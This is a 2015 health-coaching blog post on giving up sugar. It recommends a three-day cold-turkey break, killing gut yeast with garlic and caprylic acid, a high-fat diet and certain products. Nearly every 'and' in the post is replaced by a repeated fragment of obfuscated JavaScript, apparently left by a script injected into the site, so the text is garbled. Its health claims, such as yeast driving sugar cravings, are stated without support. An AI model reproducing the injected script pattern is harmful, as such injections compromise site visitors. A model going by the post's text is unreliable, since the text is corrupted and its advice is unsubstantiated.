What? No More Sweets?!

Posted On : October 28, 2015

These are the most common words I hear when coaching someone to better health. Everyone thinks that eating healthy means they will be deprived of all the foods they love, especially sweets.

Nothing could be further from the truth!

The nutrition plans we teach in our office are about making smarter choices with the QUALITY of your food. Not robbing your taste buds of a great experience.

If you have a sweet tooth, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and you know you need to give up sugar, here is my advice:

1. Remember YOU trained your sweet tooth, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and you can easily untrain it

If you crave sugar there are two reasons that this is happening. First off most of you have eaten sugar over andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and over again that now your taste buds are used to always receiving something sweet.. If this is you, my best advice is to go cold turkey off sugar for a few days. For most people, staying off sugar for 3 days stops the cravings. I know this sounds tortous, but it is truly the quickest andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and most successful way to kill your sugar addiction.

Second reason you are craving sugar is that you have too much yeast in your gut. Yeast forms in the gut due to years of eating sugar, drinking alcohol, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and eating breads. These habits will build bad yeast in the gut. When you have too much yeast it needs sugar to feed it, so it makes you crave sugar. For some of you, you need to kill that yeast in order to kill the craving. Eating lots of garlic andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and taking a caprylic acid supplement is a good way to begin to kill the yeast.

2. Eat more healthy fat

If you are on our 15-day detox, you are in the process of taking grains, sugar, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and alcohol out of your diet. If you are hungry, irritable, fatigued, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and have a fuzzy brain, you need more fat. 40-50% of your diet should be coming from healthy fats like coconut oil, organic grass fed butter, avocados, raw nuts, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and raw nut butters.

3. Make smart lateral changes

The key to eating healthy andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and satisfying your sweet tooth is to find foods that are sweet, but don’t cause your blood sugar to spike so high your insulin skyrockets. If you don’t have the Maximized Living Nutrition Book, I highly recommend getting it. There are great recipes in there.

If you are a chocolate lover, I highly recommend Lily's chocolate bars. You can find them at Whole Foods andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Sprouts. They are yummy! I promise. And they will satisfy your sweet tooth, especially if you are a chocolate lover.

Hope that's helpful! Reach out if you need help.

I'm cheering you on!!
